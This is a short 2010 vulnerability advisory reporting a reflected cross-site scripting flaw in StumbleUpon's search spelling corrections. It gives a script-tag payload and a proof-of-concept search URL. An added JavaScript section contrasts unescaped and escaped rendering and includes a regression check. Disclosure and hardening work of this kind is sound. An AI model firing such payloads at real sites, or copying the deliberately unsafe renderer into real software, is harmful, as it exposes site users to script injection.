
stumbleupon-xss.txt

Posted on 28 April 2010

|=================================================================================================|

Vulnerability............Reflected XSS
Software.................Stumbleupon.com
Date.....................4/26/10
Site.....................http://cross-site-scripting.blogspot.com/

|=================================================================================================|

##Description##

The code that displays spelling corrections does not encode user submitted data.

##Exploit##

teh<script>alert(0)</script>

##Proof of Concept##

http://www.stumbleupon.com/search?q=teh<script>alert(0)</script>

|=================================================================================================|
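
The flaw described above, as an added example that is not part of the original advisory and is not Stumbleupon's code: a hypothetical "did you mean" template rendered first without and then with output encoding. The markup, function names and suggestion value are assumptions; only the query string comes from the advisory.

```javascript
// Added illustration. The markup, function names and suggestion value are
// hypothetical; only the query string comes from the advisory.

// Encode the characters that are significant in HTML text and quoted attributes.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: submitted data is concatenated into the page as-is.
function renderCorrectionUnsafe(query, suggestion) {
  return "<p>No results for " + query + '. Did you mean <a href="/search?q=' +
    suggestion + '">' + suggestion + "</a>?</p>";
}

// Hardened pattern: encode per output context.
function renderCorrectionSafe(query, suggestion) {
  // encodeURIComponent leaves ' unescaped, so the URL is HTML-encoded as well
  // before it goes into the attribute.
  const href = "/search?q=" + encodeURIComponent(suggestion);
  return "<p>No results for " + escapeHtml(query) + '. Did you mean <a href="' +
    escapeHtml(href) + '">' + escapeHtml(suggestion) + "</a>?</p>";
}

// Regression check for a template test suite: true when an input containing
// markup characters appears byte-for-byte in the rendered output.
function reflectsRawMarkup(html, input) {
  return /[<>"']/.test(input) && html.includes(input);
}

const SAMPLE_QUERY = "teh<script>alert(0)</script>";      // from the advisory
const SAMPLE_SUGGESTION = "the<script>alert(0)</script>"; // constructed

function demo() {
  return {
    unsafe: renderCorrectionUnsafe(SAMPLE_QUERY, SAMPLE_SUGGESTION),
    safe: renderCorrectionSafe(SAMPLE_QUERY, SAMPLE_SUGGESTION),
  };
}
```
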

 
